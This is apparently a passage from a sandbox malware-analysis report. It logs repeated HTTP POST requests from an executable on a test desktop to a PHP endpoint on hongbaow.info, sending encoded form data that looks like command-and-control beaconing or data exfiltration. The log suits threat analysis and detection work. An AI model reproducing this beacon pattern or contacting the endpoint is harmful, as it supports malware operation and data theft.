                                      2025-01-22 07:43:50 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:50 UTC804INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dflvn56s%2FcOX8BvXQu5IZsXP6pFJ0XJU0h0pN4M0ubt0Zc78nfv5uGadBoK38IUa9ccO0hOUxHYInu0pZcdfT3hJCLmaNowcIXdqw5UfPRNJwQRutsYcdJKsc4gDzljV"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea522c09c470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1439&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1926121&cwnd=219&unsent_bytes=0&cid=b16880cc20912601&ts=336&x=0"
                                      2025-01-22 07:43:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      55192.168.2.456207104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:51 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:51 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:51 UTC805INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:51 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrQ8bkq9ybg6cVemhFeV8Fy1CFIVGLW9446iYXtq9zPcexHE1wMXxUy2biMm4o8XwVYsM928amNtOpmy86aQecREZ718KDxvlmnFov9HiI%2FPyT%2BOVl89Bc0H8AfOIehe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea59e82e8c11-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1812&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1595628&cwnd=203&unsent_bytes=0&cid=95cf24321e495a7e&ts=347&x=0"
                                      2025-01-22 07:43:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      56192.168.2.456208104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:55 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:55 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:55 UTC811INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:55 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ir6sBgZMhV%2BZ%2Bczp0qyA2Js2yWa8jeMtjjnxhj%2FMMRAvGUwsK5CEzbJR5YqxMu1vvEnwnMe9bhY6ArI7%2FV3LqT%2BpVmPHhGOV10h80mz3nUIxK27ufYRnyxlwATpMw0B"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea71cc27f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1482&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1970310&cwnd=107&unsent_bytes=0&cid=6ce9fb30fd95290d&ts=340&x=0"
                                      2025-01-22 07:43:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      57192.168.2.456209104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:55 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:55 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:56 UTC818INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:56 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qg3KssNr5UiS7tPNKB%2FCZ7UzinyvIUIvCHRIGm17s495Xe4BvI%2BBia%2BkFSfqRxpJRaDP5F0sg%2B%2BJukdBqJxdsJjNjlZ7dpXpSOpVec8XyOzavzM4%2FBcODIqXCcgj%2B%2FRD"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea768ca942eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1537&rtt_var=586&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1851616&cwnd=215&unsent_bytes=0&cid=18f9cd61fdaae0df&ts=343&x=0"
                                      2025-01-22 07:43:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      58192.168.2.456210104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:58 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:58 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:59 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:59 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsj5N9OUYps%2Blf2qIw%2FX6Q8TZCZ8w7yaD5u98yKMc4kL4vnJjum9V96fGMzOwIYOlmxSX3VWhuJKox2jrAKvj2fRJR5%2BJRN73CRJB%2FNEQC90njQ5h2J26WnNdv8rgQRP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea89ae358ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1821&rtt_var=699&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1603514&cwnd=162&unsent_bytes=0&cid=03d18ca92f604c1d&ts=343&x=0"
                                      2025-01-22 07:43:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      59192.168.2.456211104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:01 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:01 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:44:02 UTC804INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:01 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHmY8gRMYQC7xug1fC5Fuu9gjB6AqDVxlQf9JvX6zZaIviQSqNKUZ5mfh15WzzOhcUnHg3bnS3BP8ge%2F2myO7aeHutwpzb62tLXJEHj6s5jCLI9Mvi7hPBO6a4SbIcru"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea9b2ca443be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1585&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1842271&cwnd=231&unsent_bytes=0&cid=3e7832b9d29b5546&ts=337&x=0"
                                      2025-01-22 07:44:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      60192.168.2.456212104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:02 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:02 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:03 UTC806INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:02 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7MimbLmlBWxL2JLxYvMWqER2qZLc0PCmrWRk6gOvUs9VbYsnO6L31dubVx6LmZPcbBajw4N9RZbAoipH6xbdf9VvisBTP7oHbXJ2FgHkQc%2FfH5ld2TKPDsL%2Bw3RKdZt"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deaa17d2f8ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2352&min_rtt=1826&rtt_var=1061&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1599123&cwnd=162&unsent_bytes=0&cid=4b94012dfa05a704&ts=345&x=0"
                                      2025-01-22 07:44:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      61192.168.2.456213104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:06 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:06 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:06 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:06 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qspodmHGEdSxDmZe7JLHRcg0WVEETTtyPjocfuC1xbiblhe5fym2WmDxfpghKprI%2FPZ54zrhPjXMVanEqjsH7bSmxwhD7kdlMy%2FHRKnFs3IsJbg%2FR%2FJ7eAkfpI5BHfq"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deab9486142eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1608&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1815920&cwnd=215&unsent_bytes=0&cid=69f3c74b99e8b630&ts=321&x=0"
                                      2025-01-22 07:44:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      62192.168.2.456214104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:07 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:07 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:44:07 UTC812INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jUnQZ060GMnSp4BFQDotthjWMSDsPThWtbifRNUQ%2FSRUkZuZiAmdnVI3i9V%2BesUGxfWdTRHIaonU%2FyD2V9BLQhP6AmlrsCQTU6LAfco%2BolM7H%2FoZ7NDha7eDI1vHYnf"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905deabf68f48c11-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1821&rtt_var=699&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1603514&cwnd=203&unsent_bytes=0&cid=d1d803ba6f68b24e&ts=329&x=0"
                                      2025-01-22 07:44:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      63192.168.2.456215104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:10 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:44:10 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:44:10 UTC813INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:44:10 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xPjpPUX7ntPZD1RGoh3tH5NIgNknRYwISHSe%2BqlYvBBjqQ68aFQljjBWfb%2Bsmdk9SywG8baVDcnNt9sZ9%2FBPlLF7v%2BfF8rQ7%2Bsc1iQqJQc4%2Fb0JkTa9Tqe4or397LEfT"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dead0e931f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1452&min_rtt=1447&rtt_var=553&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1959731&cwnd=107&unsent_bytes=0&cid=d58b8cb67b59954e&ts=315&x=0"
                                      2025-01-22 07:44:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      64192.168.2.456216104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:44:13 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
